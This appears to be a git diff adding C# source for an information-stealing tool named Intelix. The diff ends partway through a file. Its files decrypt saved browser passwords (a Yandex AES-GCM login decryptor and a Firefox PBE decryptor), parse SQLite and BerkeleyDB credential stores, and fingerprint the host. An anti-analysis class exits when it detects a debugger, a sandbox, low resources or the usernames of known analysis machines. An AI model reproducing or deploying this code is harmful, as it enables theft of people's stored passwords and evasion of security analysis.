a/New/Intelix.Helper.Encrypted/YaAuthenticatedData.cs b/New/Intelix.Helper.Encrypted/YaAuthenticatedData.cs new file mode 100644 index 0000000..9394ef4 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/YaAuthenticatedData.cs @@ -0,0 +1,45 @@ +using System; +using System.Security.Cryptography; +using System.Text; + +namespace Intelix.Helper.Encrypted; + +public static class YaAuthenticatedData +{ + public static byte[] Decrypt(byte[] encryptionKey, byte[] password_value, string url, string username_element, string password_element, string username_value, string signon_realm) + { + byte[] aad = new byte[0]; + using (SHA1 sHA = SHA1.Create()) + { + byte[] bytes = Encoding.UTF8.GetBytes(url); + byte[] bytes2 = Encoding.UTF8.GetBytes(username_element); + byte[] bytes3 = Encoding.UTF8.GetBytes(username_value); + byte[] bytes4 = Encoding.UTF8.GetBytes(password_element); + byte[] bytes5 = Encoding.UTF8.GetBytes(signon_realm); + byte[] array = new byte[bytes.Length + 1 + bytes2.Length + 1 + bytes3.Length + 1 + bytes4.Length + 1 + bytes5.Length]; + int num = 0; + Array.Copy(bytes, 0, array, num, bytes.Length); + num += bytes.Length; + array[num++] = 0; + Array.Copy(bytes2, 0, array, num, bytes2.Length); + num += bytes2.Length; + array[num++] = 0; + Array.Copy(bytes3, 0, array, num, bytes3.Length); + num += bytes3.Length; + array[num++] = 0; + Array.Copy(bytes4, 0, array, num, bytes4.Length); + num += bytes4.Length; + array[num++] = 0; + Array.Copy(bytes5, 0, array, num, bytes5.Length); + aad = sHA.ComputeHash(array); + } + byte[] array2 = new byte[12]; + Array.Copy(password_value, 0, array2, 0, 12); + int num2 = password_value.Length - 12 - 16; + byte[] array3 = new byte[num2]; + Array.Copy(password_value, 12, array3, 0, num2); + byte[] array4 = new byte[16]; + Array.Copy(password_value, password_value.Length - 16, array4, 0, 16); + return AesGcm256.Decrypt(encryptionKey, array2, aad, array3, array4); + } +} diff --git a/New/Intelix.Helper.Hashing/._PBE.cs b/New/Intelix.Helper.Hashing/._PBE.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Hashing/._PBE.cs differ diff --git a/New/Intelix.Helper.Hashing/._PBKDF2.cs b/New/Intelix.Helper.Hashing/._PBKDF2.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Hashing/._PBKDF2.cs differ diff --git a/New/Intelix.Helper.Hashing/PBE.cs b/New/Intelix.Helper.Hashing/PBE.cs new file mode 100644 index 0000000..d5a3a16 --- /dev/null +++ b/New/Intelix.Helper.Hashing/PBE.cs @@ -0,0 +1,46 @@ +using System; +using System.Security.Cryptography; + +namespace Intelix.Helper.Hashing; + +public class PBE +{ + private byte[] Ciphertext { get; } + + private byte[] GlobalSalt { get; } + + private byte[] MasterPass { get; } + + private byte[] EntrySalt { get; } + + private byte[] PartIv { get; } + + public PBE(byte[] ciphertext, byte[] globalSalt, byte[] masterPassword, byte[] entrySalt, byte[] partIv) + { + Ciphertext = ciphertext; + GlobalSalt = globalSalt; + MasterPass = masterPassword; + EntrySalt = entrySalt; + PartIv = partIv; + } + + public byte[] Compute() + { + byte[] array = new byte[GlobalSalt.Length + MasterPass.Length]; + Buffer.BlockCopy(GlobalSalt, 0, array, 0, GlobalSalt.Length); + Buffer.BlockCopy(MasterPass, 0, array, GlobalSalt.Length, MasterPass.Length); + byte[] password = new SHA1Managed().ComputeHash(array); + byte[] array2 = new byte[2] { 4, 14 }; + byte[] array3 = new byte[array2.Length + PartIv.Length]; + Buffer.BlockCopy(array2, 0, array3, 0, array2.Length); + Buffer.BlockCopy(PartIv, 0, array3, array2.Length, PartIv.Length); + byte[] bytes = new PBKDF2(new HMACSHA256(), password, EntrySalt, 1).GetBytes(32); + return new AesManaged + { + Mode = CipherMode.CBC, + BlockSize = 128, + KeySize = 256, + Padding = PaddingMode.Zeros + }.CreateDecryptor(bytes, array3).TransformFinalBlock(Ciphertext, 0, Ciphertext.Length); + } +} diff --git a/New/Intelix.Helper.Hashing/PBKDF2.cs b/New/Intelix.Helper.Hashing/PBKDF2.cs new file mode 100644 index 0000000..b3ca86a --- /dev/null +++ b/New/Intelix.Helper.Hashing/PBKDF2.cs @@ -0,0 +1,106 @@ +using System; +using System.Security.Cryptography; + +namespace Intelix.Helper.Hashing; + +public class PBKDF2 +{ + private readonly int _blockSize; + + private uint _blockIndex = 1u; + + private byte[] _bufferBytes; + + private int _bufferStartIndex; + + private int _bufferEndIndex; + + private HMAC Algorithm { get; } + + private byte[] Salt { get; } + + private int IterationCount { get; } + + public PBKDF2(HMAC algorithm, byte[] password, byte[] salt, int iterations) + { + Algorithm = algorithm ?? throw new ArgumentNullException("algorithm", "Algorithm cannot be null."); + Algorithm.Key = password ?? throw new ArgumentNullException("password", "Password cannot be null."); + Salt = salt ?? throw new ArgumentNullException("salt", "Salt cannot be null."); + IterationCount = iterations; + _blockSize = Algorithm.HashSize / 8; + _bufferBytes = new byte[_blockSize]; + } + + public byte[] GetBytes(int count) + { + byte[] array = new byte[count]; + int i = 0; + int num = _bufferEndIndex - _bufferStartIndex; + if (num > 0) + { + if (count < num) + { + Buffer.BlockCopy(_bufferBytes, _bufferStartIndex, array, 0, count); + _bufferStartIndex += count; + return array; + } + Buffer.BlockCopy(_bufferBytes, _bufferStartIndex, array, 0, num); + _bufferStartIndex = (_bufferEndIndex = 0); + i += num; + } + for (; i < count; i += _blockSize) + { + int num2 = count - i; + _bufferBytes = Func(); + if (num2 > _blockSize) + { + Buffer.BlockCopy(_bufferBytes, 0, array, i, _blockSize); + continue; + } + Buffer.BlockCopy(_bufferBytes, 0, array, i, num2); + _bufferStartIndex = num2; + _bufferEndIndex = _blockSize; + return array; + } + return array; + } + + private byte[] Func() + { + byte[] array = new byte[Salt.Length + 4]; + Buffer.BlockCopy(Salt, 0, array, 0, Salt.Length); + Buffer.BlockCopy(GetBytesFromInt(_blockIndex), 0, array, Salt.Length, 4); + byte[] array2 = Algorithm.ComputeHash(array); + byte[] array3 = array2; + for (int i = 2; i <= IterationCount; i++) + { + array2 = Algorithm.ComputeHash(array2, 0, array2.Length); + for (int j = 0; j < _blockSize; j++) + { + array3[j] ^= array2[j]; + } + } + if (_blockIndex == uint.MaxValue) + { + throw new InvalidOperationException("Derived key too long."); + } + _blockIndex++; + return array3; + } + + private static byte[] GetBytesFromInt(uint i) + { + byte[] bytes = BitConverter.GetBytes(i); + if (!BitConverter.IsLittleEndian) + { + return bytes; + } + return new byte[4] + { + bytes[3], + bytes[2], + bytes[1], + bytes[0] + }; + } +} diff --git a/New/Intelix.Helper.Sql/._BerkeleyDB.cs b/New/Intelix.Helper.Sql/._BerkeleyDB.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Sql/._BerkeleyDB.cs differ diff --git a/New/Intelix.Helper.Sql/._SqLite.cs b/New/Intelix.Helper.Sql/._SqLite.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper.Sql/._SqLite.cs differ diff --git a/New/Intelix.Helper.Sql/BerkeleyDB.cs b/New/Intelix.Helper.Sql/BerkeleyDB.cs new file mode 100644 index 0000000..657d13d --- /dev/null +++ b/New/Intelix.Helper.Sql/BerkeleyDB.cs @@ -0,0 +1,72 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; + +namespace Intelix.Helper.Sql; + +public class BerkeleyDB +{ + public List> Keys { get; } + + public BerkeleyDB(byte[] file) + { + List list = new List(); + Keys = new List>(); + using (MemoryStream input = new MemoryStream(file)) + { + using BinaryReader binaryReader = new BinaryReader(input); + int i = 0; + for (int num = (int)binaryReader.BaseStream.Length; i < num; i++) + { + list.Add(binaryReader.ReadByte()); + } + } + string text = BitConverter.ToString(Extract(list.ToArray(), 0, 4, littleEndian: false)).Replace("-", ""); + int num2 = BitConverter.ToInt32(Extract(list.ToArray(), 12, 4, littleEndian: true), 0); + if (!text.Equals("00061561")) + { + return; + } + int num3 = int.Parse(BitConverter.ToString(Extract(list.ToArray(), 56, 4, littleEndian: false)).Replace("-", "")); + int num4 = 1; + while (Keys.Count < num3) + { + string[] array = new string[(num3 - Keys.Count) * 2]; + for (int j = 0; j < (num3 - Keys.Count) * 2; j++) + { + array[j] = BitConverter.ToString(Extract(list.ToArray(), num2 * num4 + 2 + j * 2, 2, littleEndian: true)).Replace("-", ""); + } + Array.Sort(array); + for (int k = 0; k < array.Length; k += 2) + { + int num5 = Convert.ToInt32(array[k], 16) + num2 * num4; + int num6 = Convert.ToInt32(array[k + 1], 16) + num2 * num4; + int num7 = ((k + 2 >= array.Length) ? (num2 + num2 * num4) : (Convert.ToInt32(array[k + 2], 16) + num2 * num4)); + string text2 = Encoding.ASCII.GetString(Extract(list.ToArray(), num6, num7 - num6, littleEndian: false)); + string value = BitConverter.ToString(Extract(list.ToArray(), num5, num6 - num5, littleEndian: false)); + if (!string.IsNullOrWhiteSpace(text2)) + { + Keys.Add(new KeyValuePair(text2, value)); + } + } + num4++; + } + } + + private static byte[] Extract(byte[] source, int start, int length, bool littleEndian) + { + byte[] array = new byte[length]; + int num = 0; + for (int i = start; i < start + length; i++) + { + array[num] = source[i]; + num++; + } + if (littleEndian) + { + Array.Reverse(array); + } + return array; + } +} diff --git a/New/Intelix.Helper.Sql/SqLite.cs b/New/Intelix.Helper.Sql/SqLite.cs new file mode 100644 index 0000000..591b7fa --- /dev/null +++ b/New/Intelix.Helper.Sql/SqLite.cs @@ -0,0 +1,457 @@ +using System; +using System.IO; +using System.Text; + +namespace Intelix.Helper.Sql; + +public class SqLite +{ + private struct RecordHeaderField + { + public long Size; + + public long Type; + } + + private struct TableEntry + { + public string[] Content; + } + + private struct SqliteMasterEntry + { + public string ItemName; + + public long RootNum; + + public string SqlStatement; + } + + private readonly ulong _dbEncoding; + + private readonly byte[] _fileBytes; + + private readonly ulong _pageSize; + + private readonly byte[] _sqlDataTypeSize = new byte[10] { 0, 1, 2, 3, 4, 6, 8, 8, 0, 0 }; + + private string[] _fieldNames; + + private SqliteMasterEntry[] _masterTableEntries; + + private TableEntry[] _tableEntries; + + public SqLite(string fileName) + { + _fileBytes = File.ReadAllBytes(fileName); + _pageSize = ConvertToULong(16, 2); + _dbEncoding = ConvertToULong(56, 4); + ReadMasterTable(100L); + } + + public SqLite(byte[] basedata) + { + _fileBytes = basedata; + _pageSize = ConvertToULong(16, 2); + _dbEncoding = ConvertToULong(56, 4); + ReadMasterTable(100L); + } + + public string GetValue(int rowNum, int field) + { + try + { + if (rowNum >= _tableEntries.Length) + { + return null; + } + return (field >= _tableEntries[rowNum].Content.Length) ? null : _tableEntries[rowNum].Content[field]; + } + catch + { + return ""; + } + } + + public int GetRowCount() + { + return _tableEntries.Length; + } + + private bool ReadTableFromOffset(ulong offset) + { + try + { + switch (_fileBytes[offset]) + { + case 13: + { + uint num4 = (uint)(ConvertToULong((int)offset + 3, 2) - 1); + int num5 = 0; + if (_tableEntries != null) + { + num5 = _tableEntries.Length; + Array.Resize(ref _tableEntries, _tableEntries.Length + (int)num4 + 1); + } + else + { + _tableEntries = new TableEntry[num4 + 1]; + } + for (uint num6 = 0u; (int)num6 <= (int)num4; num6++) + { + ulong num7 = ConvertToULong((int)offset + 8 + (int)(num6 * 2), 2); + if (offset != 100) + { + num7 += offset; + } + int num8 = Gvl((int)num7); + Cvl((int)num7, num8); + int num9 = Gvl((int)((long)num7 + ((long)num8 - (long)num7) + 1)); + Cvl((int)((long)num7 + ((long)num8 - (long)num7) + 1), num9); + ulong num10 = num7 + (ulong)((long)num9 - (long)num7 + 1); + int num11 = Gvl((int)num10); + int num12 = num11; + long num13 = Cvl((int)num10, num11); + RecordHeaderField[] array = null; + long num14 = (long)num10 - (long)num11 + 1; + int num15 = 0; + while (num14 < num13) + { + Array.Resize(ref array, num15 + 1); + int num16 = num12 + 1; + num12 = Gvl(num16); + array[num15].Type = Cvl(num16, num12); + array[num15].Size = ((array[num15].Type <= 9) ? _sqlDataTypeSize[array[num15].Type] : ((!IsOdd(array[num15].Type)) ? ((array[num15].Type - 12) / 2) : ((array[num15].Type - 13) / 2))); + num14 = num14 + (num12 - num16) + 1; + num15++; + } + if (array == null) + { + continue; + } + _tableEntries[num5 + (int)num6].Content = new string[array.Length]; + int num17 = 0; + for (int i = 0; i <= array.Length - 1; i++) + { + if (array[i].Type > 9) + { + if (!IsOdd(array[i].Type)) + { + long dbEncoding = (long)_dbEncoding; + long num18 = dbEncoding - 1; + if ((ulong)num18 <= 2uL) + { + switch (num18) + { + case 0L: + _tableEntries[num5 + (int)num6].Content[i] = Encoding.Default.GetString(_fileBytes, (int)((long)num10 + num13 + num17), (int)array[i].Size); + break; + case 1L: + _tableEntries[num5 + (int)num6].Content[i] = Encoding.Unicode.GetString(_fileBytes, (int)((long)num10 + num13 + num17), (int)array[i].Size); + break; + case 2L: + _tableEntries[num5 + (int)num6].Content[i] = Encoding.BigEndianUnicode.GetString(_fileBytes, (int)((long)num10 + num13 + num17), (int)array[i].Size); + break; + } + } + } + else + { + _tableEntries[num5 + (int)num6].Content[i] = Encoding.Default.GetString(_fileBytes, (int)((long)num10 + num13 + num17), (int)array[i].Size); + } + } + else + { + _tableEntries[num5 + (int)num6].Content[i] = Convert.ToString(ConvertToULong((int)((long)num10 + num13 + num17), (int)array[i].Size)); + } + num17 += (int)array[i].Size; + } + } + break; + } + case 5: + { + uint num = (uint)(ConvertToULong((int)(offset + 3), 2) - 1); + for (uint num2 = 0u; (int)num2 <= (int)num; num2++) + { + uint num3 = (uint)ConvertToULong((int)offset + 12 + (int)(num2 * 2), 2); + ReadTableFromOffset((ConvertToULong((int)(offset + num3), 4) - 1) * _pageSize); + } + ReadTableFromOffset((ConvertToULong((int)(offset + 8), 4) - 1) * _pageSize); + break; + } + } + return true; + } + catch + { + return false; + } + } + + private void ReadMasterTable(long offset) + { + while (true) + { + switch (_fileBytes[offset]) + { + default: + return; + case 5: + { + uint num13 = (uint)(ConvertToULong((int)offset + 3, 2) - 1); + for (int j = 0; j <= (int)num13; j++) + { + uint num14 = (uint)ConvertToULong((int)offset + 12 + j * 2, 2); + if (offset == 100) + { + ReadMasterTable((long)((ConvertToULong((int)num14, 4) - 1) * _pageSize)); + } + else + { + ReadMasterTable((long)((ConvertToULong((int)(offset + num14), 4) - 1) * _pageSize)); + } + } + break; + } + case 13: + { + ulong num = ConvertToULong((int)offset + 3, 2) - 1; + int num2 = 0; + if (_masterTableEntries != null) + { + num2 = _masterTableEntries.Length; + Array.Resize(ref _masterTableEntries, _masterTableEntries.Length + (int)num + 1); + } + else + { + checked + { + _masterTableEntries = new SqliteMasterEntry[(ulong)unchecked((long)(num + 1))]; + } + } + for (ulong num3 = 0uL; num3 <= num; num3++) + { + ulong num4 = ConvertToULong((int)offset + 8 + (int)num3 * 2, 2); + if (offset != 100) + { + num4 += (ulong)offset; + } + int num5 = Gvl((int)num4); + Cvl((int)num4, num5); + int num6 = Gvl((int)((long)num4 + ((long)num5 - (long)num4) + 1)); + Cvl((int)((long)num4 + ((long)num5 - (long)num4) + 1), num6); + ulong num7 = num4 + (ulong)((long)num6 - (long)num4 + 1); + int num8 = Gvl((int)num7); + int num9 = num8; + long num10 = Cvl((int)num7, num8); + long[] array = new long[5]; + for (int i = 0; i <= 4; i++) + { + int startIdx = num9 + 1; + num9 = Gvl(startIdx); + array[i] = Cvl(startIdx, num9); + array[i] = ((array[i] <= 9) ? _sqlDataTypeSize[array[i]] : ((!IsOdd(array[i])) ? ((array[i] - 12) / 2) : ((array[i] - 13) / 2))); + } + long dbEncoding; + if (_dbEncoding == 1 || _dbEncoding == 2) + { + dbEncoding = (long)_dbEncoding; + long num11 = dbEncoding - 1; + if ((ulong)num11 <= 2uL) + { + switch (num11) + { + case 0L: + _masterTableEntries[num2 + (int)num3].ItemName = Encoding.Default.GetString(_fileBytes, (int)((long)num7 + num10 + array[0]), (int)array[1]); + break; + case 1L: + _masterTableEntries[num2 + (int)num3].ItemName = Encoding.Unicode.GetString(_fileBytes, (int)((long)num7 + num10 + array[0]), (int)array[1]); + break; + case 2L: + _masterTableEntries[num2 + (int)num3].ItemName = Encoding.BigEndianUnicode.GetString(_fileBytes, (int)((long)num7 + num10 + array[0]), (int)array[1]); + break; + } + } + } + _masterTableEntries[num2 + (int)num3].RootNum = (long)ConvertToULong((int)((long)num7 + num10 + array[0] + array[1] + array[2]), (int)array[3]); + dbEncoding = (long)_dbEncoding; + long num12 = dbEncoding - 1; + if ((ulong)num12 <= 2uL) + { + switch (num12) + { + case 0L: + _masterTableEntries[num2 + (int)num3].SqlStatement = Encoding.Default.GetString(_fileBytes, (int)((long)num7 + num10 + array[0] + array[1] + array[2] + array[3]), (int)array[4]); + break; + case 1L: + _masterTableEntries[num2 + (int)num3].SqlStatement = Encoding.Unicode.GetString(_fileBytes, (int)((long)num7 + num10 + array[0] + array[1] + array[2] + array[3]), (int)array[4]); + break; + case 2L: + _masterTableEntries[num2 + (int)num3].SqlStatement = Encoding.BigEndianUnicode.GetString(_fileBytes, (int)((long)num7 + num10 + array[0] + array[1] + array[2] + array[3]), (int)array[4]); + break; + } + } + } + return; + } + } + offset = (long)((ConvertToULong((int)offset + 8, 4) - 1) * _pageSize); + } + } + + public bool ReadTable(string tableName) + { + int num = -1; + for (int i = 0; i <= _masterTableEntries.Length; i++) + { + if (string.Compare(_masterTableEntries[i].ItemName.ToLower(), tableName.ToLower(), StringComparison.Ordinal) == 0) + { + num = i; + break; + } + } + if (num == -1) + { + return false; + } + string[] array = _masterTableEntries[num].SqlStatement.Substring(_masterTableEntries[num].SqlStatement.IndexOf("(", StringComparison.Ordinal) + 1).Split(','); + for (int j = 0; j <= array.Length - 1; j++) + { + array[j] = array[j].TrimStart(); + int num2 = array[j].IndexOf(' '); + if (num2 > 0) + { + array[j] = array[j].Substring(0, num2); + } + if (array[j].IndexOf("UNIQUE", StringComparison.Ordinal) != 0) + { + Array.Resize(ref _fieldNames, j + 1); + _fieldNames[j] = array[j]; + } + } + return ReadTableFromOffset((ulong)(_masterTableEntries[num].RootNum - 1) * _pageSize); + } + + private ulong ConvertToULong(int startIndex, int size) + { + try + { + if (size > 8 || size == 0) + { + return 0uL; + } + ulong num = 0uL; + for (int i = 0; i <= size - 1; i++) + { + num = (num << 8) | _fileBytes[startIndex + i]; + } + return num; + } + catch + { + return 0uL; + } + } + + private int Gvl(int startIdx) + { + try + { + if (startIdx > _fileBytes.Length) + { + return 0; + } + for (int i = startIdx; i <= startIdx + 8; i++) + { + if (i > _fileBytes.Length - 1) + { + return 0; + } + if ((_fileBytes[i] & 0x80) != 128) + { + return i; + } + } + return startIdx + 8; + } + catch + { + return 0; + } + } + + private long Cvl(int startIdx, int endIdx) + { + try + { + endIdx++; + byte[] array = new byte[8]; + int num = endIdx - startIdx; + bool flag = false; + if (num == 0 || num > 9) + { + return 0L; + } + switch (num) + { + case 1: + array[0] = (byte)(_fileBytes[startIdx] & 0x7F); + return BitConverter.ToInt64(array, 0); + case 9: + flag = true; + break; + } + int num2 = 1; + int num3 = 7; + int num4 = 0; + if (flag) + { + array[0] = _fileBytes[endIdx - 1]; + endIdx--; + num4 = 1; + } + for (int i = endIdx - 1; i >= startIdx; i += -1) + { + if (i - 1 >= startIdx) + { + array[num4] = (byte)(((_fileBytes[i] >> num2 - 1) & (255 >> num2)) | (_fileBytes[i - 1] << num3)); + num2++; + num4++; + num3--; + } + else if (!flag) + { + array[num4] = (byte)((_fileBytes[i] >> num2 - 1) & (255 >> num2)); + } + } + return BitConverter.ToInt64(array, 0); + } + catch + { + return 0L; + } + } + + private static bool IsOdd(long value) + { + return (value & 1) == 1; + } + + public static SqLite ReadTable(string database, string table) + { + try + { + string text = Path.GetTempFileName() + ".tmpdb"; + File.Copy(database, text); + SqLite sqLite = new SqLite(text); + sqLite.ReadTable(table); + File.Delete(text); + return (sqLite.GetRowCount() == 65536) ? null : sqLite; + } + catch + { + return null; + } + } +} diff --git a/New/Intelix.Helper/._AntiVirtual.cs b/New/Intelix.Helper/._AntiVirtual.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._AntiVirtual.cs differ diff --git a/New/Intelix.Helper/._BlobParsedData.cs b/New/Intelix.Helper/._BlobParsedData.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._BlobParsedData.cs differ diff --git a/New/Intelix.Helper/._ConcurrentLong.cs b/New/Intelix.Helper/._ConcurrentLong.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._ConcurrentLong.cs differ diff --git a/New/Intelix.Helper/._CpuInfo.cs b/New/Intelix.Helper/._CpuInfo.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._CpuInfo.cs differ diff --git a/New/Intelix.Helper/._HwidGenerator.cs b/New/Intelix.Helper/._HwidGenerator.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._HwidGenerator.cs differ diff --git a/New/Intelix.Helper/._ImpersonationHelper.cs b/New/Intelix.Helper/._ImpersonationHelper.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._ImpersonationHelper.cs differ diff --git a/New/Intelix.Helper/._IpApi.cs b/New/Intelix.Helper/._IpApi.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._IpApi.cs differ diff --git a/New/Intelix.Helper/._MutexControl.cs b/New/Intelix.Helper/._MutexControl.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._MutexControl.cs differ diff --git a/New/Intelix.Helper/._NativeMethods.cs b/New/Intelix.Helper/._NativeMethods.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._NativeMethods.cs differ diff --git a/New/Intelix.Helper/._ParseKeyBlob.cs b/New/Intelix.Helper/._ParseKeyBlob.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._ParseKeyBlob.cs differ diff --git a/New/Intelix.Helper/._ProcessKiller.cs b/New/Intelix.Helper/._ProcessKiller.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._ProcessKiller.cs differ diff --git a/New/Intelix.Helper/._ProcessWindows.cs b/New/Intelix.Helper/._ProcessWindows.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._ProcessWindows.cs differ diff --git a/New/Intelix.Helper/._RandomStrings.cs b/New/Intelix.Helper/._RandomStrings.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._RandomStrings.cs differ diff --git a/New/Intelix.Helper/._RegistryParser.cs b/New/Intelix.Helper/._RegistryParser.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._RegistryParser.cs differ diff --git a/New/Intelix.Helper/._RestoreCookies.cs b/New/Intelix.Helper/._RestoreCookies.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._RestoreCookies.cs differ diff --git a/New/Intelix.Helper/._WindowsInfo.cs b/New/Intelix.Helper/._WindowsInfo.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Helper/._WindowsInfo.cs differ diff --git a/New/Intelix.Helper/AntiVirtual.cs b/New/Intelix.Helper/AntiVirtual.cs new file mode 100644 index 0000000..0d0928e --- /dev/null +++ b/New/Intelix.Helper/AntiVirtual.cs @@ -0,0 +1,101 @@ +using System; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Management; + +namespace Intelix.Helper; + +public static class AntiVirtual +{ + public static void CheckOrExit() + { + if (ProccessorCheck()) + { + throw new Exception(); + } + if (CheckDebugger()) + { + throw new Exception(); + } + if (CheckMemory()) + { + throw new Exception(); + } + if (CheckDriveSpace()) + { + throw new Exception(); + } + if (CheckUserConditions()) + { + throw new Exception(); + } + if (CheckCache()) + { + throw new Exception(); + } + if (CheckFileName()) + { + throw new Exception(); + } + if (CheckCim()) + { + throw new Exception(); + } + } + + public static bool CheckFileName() + { + return Path.GetFileNameWithoutExtension(Process.GetCurrentProcess().MainModule.FileName).ToLower().Contains("sandbox"); + } + + public static bool ProccessorCheck() + { + return Environment.ProcessorCount <= 1; + } + + public static bool CheckDebugger() + { + return Debugger.IsAttached; + } + + public static bool CheckDriveSpace() + { + return new DriveInfo("C").TotalSize / 1073741824 < 50; + } + + public static bool CheckCache() + { + return CheckCount("Select * from Win32_CacheMemory"); + } + + public static bool CheckCim() + { + return CheckCount("Select * from CIM_Memory"); + } + + public static bool CheckCount(string selector) + { + return new ManagementObjectSearcher(selector).Get().Count == 0; + } + + public static bool CheckMemory() + { + return Convert.ToDouble(new ManagementObjectSearcher("Select * From Win32_ComputerSystem").Get().Cast().FirstOrDefault()["TotalPhysicalMemory"]) / 1048576.0 < 2048.0; + } + + public static bool CheckUserConditions() + { + string text = Environment.UserName.ToLower(); + string text2 = Environment.MachineName.ToLower(); + if ((!(text == "frank") || !text2.Contains("desktop")) && !(text == "WDAGUtilityAccount")) + { + if (text == "robert") + { + return text2.Contains("22h2"); + } + return false; + } + return true; + } +} diff --git a/New/Intelix.Helper/BlobParsedData.cs b/New/Intelix.Helper/BlobParsedData.cs new file mode 100644 index 0000000..2ee345e --- /dev/null +++ b/New/Intelix.Helper/BlobParsedData.cs @@ -0,0 +1,14 @@ +namespace Intelix.Helper; + +public class BlobParsedData +{ + public byte Flag { get; set; } + + public byte[] Iv { get; set; } + + public byte[] Ciphertext { get; set; } + + public byte[] Tag { get; set; } + + public byte[] EncryptedAesKey { get; set; } +} diff --git a/New/Intelix.Helper/ConcurrentLong.cs b/New/Intelix.Helper/ConcurrentLong.cs new file mode 100644 index 0000000..0419117 --- /dev/null +++ b/New/Intelix.Helper/ConcurrentLong.cs @@ -0,0 +1,59 @@ +using System.Threading; + +namespace Intelix.Helper; + +public struct ConcurrentLong +{ + private long _value; + + public long Value + { + get + { + return Interlocked.Read(ref _value); + } + set + { + Interlocked.Exchange(ref _value, value); + } + } + + public ConcurrentLong(long initial) + { + _value = initial; + } + + public static ConcurrentLong operator ++(ConcurrentLong x) + { + Interlocked.Increment(ref x._value); + return x; + } + + public static ConcurrentLong operator --(ConcurrentLong x) + { + Interlocked.Decrement(ref x._value); + return x; + } + + public static implicit operator long(ConcurrentLong x) + { + return x.Value; + } + + public static implicit operator ConcurrentLong(long v) + { + return new ConcurrentLong(v); + } + + public static ConcurrentLong operator +(ConcurrentLong x, long y) + { + Interlocked.Add(ref x._value, y); + return x; + } + + public static ConcurrentLong operator -(ConcurrentLong x, long y) + { + Interlocked.Add(ref x._value, -y); + return x; + } +} diff --git a/New/Intelix.Helper/CpuInfo.cs b/New/Intelix.Helper/CpuInfo.cs new file mode 100644 index 0000000..912895e --- /dev/null +++ b/New/Intelix.Helper/CpuInfo.cs @@ -0,0 +1,32 @@ +using System; +using Microsoft.Win32; + +namespace Intelix.Helper; + +public static class CpuInfo +{ + public static string GetName() + { + try + { + using RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"); + return (registryKey?.GetValue("ProcessorNameString") as string) ?? (registryKey?.GetValue("VendorIdentifier") as string) ?? "Unknown"; + } + catch + { + return "Unknown"; + } + } + + public static int GetLogicalCores() + { + try + { + return Environment.ProcessorCount; + } + catch + { + return 0; + } + } +} diff --git a/New/Intelix.Helper/HwidGenerator.cs b/New/Intelix.Helper/HwidGenerator.cs new file mode 100644 index 0000000..2ca8ffc --- /dev/null +++ b/New/Intelix.Helper/HwidGenerator.cs @@ -0,0 +1,186 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Net.NetworkInformation; +using System.Security.Cryptography; +using System.Text; +using System.Threading.Tasks; +using Microsoft.Win32; + +namespace Intelix.Helper; + +public static class HwidGenerator +{ + private static string _hwid; + + private static readonly object _lock = new object(); + + public static string GetHwid() + { + if (_hwid != null) + { + return _hwid; + } + lock (_lock) + { + if (_hwid != null) + { + return _hwid; + } + List list = new List(); + string mg = null; + string cpuName = null; + List vols = null; + List macs = null; + Task task = Task.Run(delegate + { + mg = GetMachineGuid(); + }); + Task task2 = Task.Run(delegate + { + cpuName = GetCpuName(); + }); + Task task3 = Task.Run(delegate + { + vols = GetFixedVolumeSerials(); + }); + Task task4 = Task.Run(delegate + { + macs = GetMacAddresses(); + }); + Task.WaitAll(task, task2, task3, task4); + if (!string.IsNullOrEmpty(mg)) + { + list.Add("MG:" + mg); + } + if (!string.IsNullOrEmpty(cpuName)) + { + list.Add("CPU:" + cpuName); + } + list.Add("Cores:" + Environment.ProcessorCount); + if (vols != null && vols.Count > 0) + { + list.Add("VOLS:" + string.Join(",", vols)); + } + if (macs != null && macs.Count > 0) + { + list.Add("MACS:" + string.Join(",", macs)); + } + list.Add("MN:" + Environment.MachineName); + _hwid = ComputeSha256(string.Join("|", list)); + return _hwid; + } + } + + private static string ComputeSha256(string input) + { + using SHA256 sHA = SHA256.Create(); + byte[] array = sHA.ComputeHash(Encoding.UTF8.GetBytes(input)); + StringBuilder stringBuilder = new StringBuilder(array.Length * 2); + byte[] array2 = array; + foreach (byte b in array2) + { + stringBuilder.Append(b.ToString("x2")); + } + return stringBuilder.ToString(); + } + + private static string GetMachineGuid() + { + try + { + using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey("SOFTWARE\\Microsoft\\Cryptography")) + { + string text = registryKey?.GetValue("MachineGuid") as string; + if (!string.IsNullOrEmpty(text)) + { + return text.Trim(); + } + } + using 